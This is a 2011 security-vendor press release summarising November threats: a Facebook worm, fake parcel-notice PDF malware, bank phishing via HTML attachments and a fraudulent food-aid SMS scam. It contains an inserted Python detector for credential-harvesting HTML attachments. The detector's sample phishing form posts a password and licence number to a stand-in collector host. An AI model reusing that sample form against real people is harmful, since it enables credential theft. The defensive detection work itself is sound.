Cybercriminals Kick Off Holiday Season by Spreading Malware and Phishing Attacks

GFI Labs identified numerous scams last month, including cybercriminals posing as the federal government to exploit food stamp recipients

GFI Software today released its VIPRE Report, a compilation of the 10 most prevalent threat detections for the previous month. Noteworthy threats in November 2011 included a new Facebook worm; the return of PDF-based malware posing as the postal services and parcel firms; and Bank of America and SunTrust Bank phishing scams.

“Staying vigilant online – especially during the holiday shopping season – is key to not falling victim to scams or infecting a PC by clicking on malicious links or files,” said Christopher Boyd, senior threat researcher for GFI Software. “When in doubt, users should take a page from Santa’s playbook by ‘checking it twice.’ Never open attachments or provide information in response to unsolicited emails, and always remember that a bank will never ask for sensitive information via email.”

In the days leading up to Thanksgiving in the US, GFI Labs detected an increase in bank-related phishing. Users received emails purporting to originate from major retail banks including SunTrust Bank and Bank of America. Both scams were unique in that they contained an HTML attachment which was actually a form asking for banking login information and even driver’s license numbers. Users who doubt the authenticity of an email communication from their bank should call their local branch or the customer services phone number printed on the back of their debit or credit card to verify.
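For mail administrators, the HTML-attachment pattern described above can be flagged at the gateway. The following Python sketch is an added example, not GFI's detection logic: it walks a message's MIME parts and reports HTML attachments containing forms with password or other sensitive-looking fields. The keyword list, field names and `collector.example` URL are assumptions constructed for the demo.

```python
import re
from email import message_from_string
from html.parser import HTMLParser

# Assumed keyword list for sensitive field names; tune it for your own mail flow.
SENSITIVE = re.compile(r"pass|ssn|licen[sc]e|account|card", re.I)

class FormScanner(HTMLParser):
    """Collects form actions and sensitive-looking input fields."""
    def __init__(self):
        super().__init__()
        self.actions, self.fields = [], []
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.actions.append(a.get("action", ""))
        elif tag == "input":
            name = a.get("name") or a.get("id", "")
            if a.get("type", "").lower() == "password" or SENSITIVE.search(name):
                self.fields.append(name)

def scan_message(raw):
    """Return one finding per HTML attachment that carries a credential form."""
    findings = []
    for part in message_from_string(raw).walk():
        fname = part.get_filename() or ""
        is_html = part.get_content_type() == "text/html" or fname.lower().endswith((".htm", ".html"))
        if not is_html or part.get_content_disposition() != "attachment":
            continue  # inline bodies and non-HTML parts are out of scope here
        body = (part.get_payload(decode=True) or b"").decode(
            part.get_content_charset() or "utf-8", "replace")
        scanner = FormScanner()
        scanner.feed(body)
        if scanner.fields:
            remote = [u for u in scanner.actions if u.lower().startswith(("http://", "https://"))]
            findings.append({"file": fname, "fields": scanner.fields, "remote_actions": remote})
    return findings

# Constructed sample message for the demo (not a captured phishing email).
SAMPLE = """\
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html
Content-Disposition: attachment; filename="verify.html"

<form action="http://collector.example/post" method="post">
<input type="password" name="passcode"><input name="drivers_license"></form>
--b1--
"""
```

A finding is a reason to quarantine or route the message for review, since legitimate banks rarely send login forms as attachments.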

PDF-based malware made a return in November. This type of attack is not new, but the time of year makes this one particularly effective. Users receive emails from what appears to be a legitimate parcel delivery company or postal operator, informing them that they have a package that cannot be delivered due to insufficient address information. The attached PDF appears to be a shipping label which users are instructed to print. Upon opening the file, a variant of FakeSysDef, a rogue malware program, is installed.

“Underscoring that anyone can be a target of cybercrime and that it’s not just big enterprises and banks that are at risk, last month we found scammers targeting people with limited financial resources,” said Jovi Umawing, threat researcher for GFI Software. “A fraudulent food aid website was set up to misappropriate the mobile phone numbers of those supported by food donation schemes. Thinking they were responding to an official request from the government, victims provided their phone numbers, which were automatically enrolled in a premium SMS service, placing unauthorised and unwanted charges on their phone bills.”